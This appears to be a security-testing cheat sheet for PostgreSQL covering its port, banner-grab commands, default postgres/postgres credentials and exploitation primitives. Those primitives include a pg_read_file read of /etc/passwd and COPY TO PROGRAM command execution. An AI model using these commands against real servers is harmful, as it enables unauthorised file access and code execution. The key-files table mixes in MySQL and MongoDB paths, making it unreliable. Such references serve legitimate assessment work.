PostgreSQL
PostgreSQLPostgresPG
PostgreSQL is an advanced open-source database. Weak passwords, exposed trust authentication, and RCE via COPY statement are common vectors.
Ports
| Port | Protocol | Description |
|---|---|---|
| 5432 | tcp | PostgreSQL |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
nmap -sV -p <port> <target> | Service banner and version info |
nc -nv <target> <port> | Raw banner grab |
Key Files
| Path | Description |
|---|---|
/etc/mysql/mysql.cnf | MySQL client configuration |
/var/lib/mysql/mysql/user.MYD | MySQL user table data |
postgresql.conf | PostgreSQL configuration file |
pg_hba.conf | PostgreSQL client authentication rules |
mongod.conf | MongoDB daemon configuration |
Default Credentials
| Username | Password | Context |
|---|---|---|
postgres | postgres | Default superuser |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
— | Auth | trust authentication misconfiguration |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Read File (superuser) | SELECT pg_read_file('/etc/passwd'); | Read server files |
| COPY RCE | COPY (select 'rev') TO PROGRAM 'id'; | RCE via COPY TO PROGRAM |
Notes
Always start with full port scan: `nmap -sV -sC -p- <target>`.
Check for default credentials before brute-forcing.
Use service-specific NSE scripts: `nmap --script <service>-* -p <port> <target>`.
Remember to check both IPv4 and IPv6 if applicable.
Seen on
ShodanCensysFOFAZoomEye
References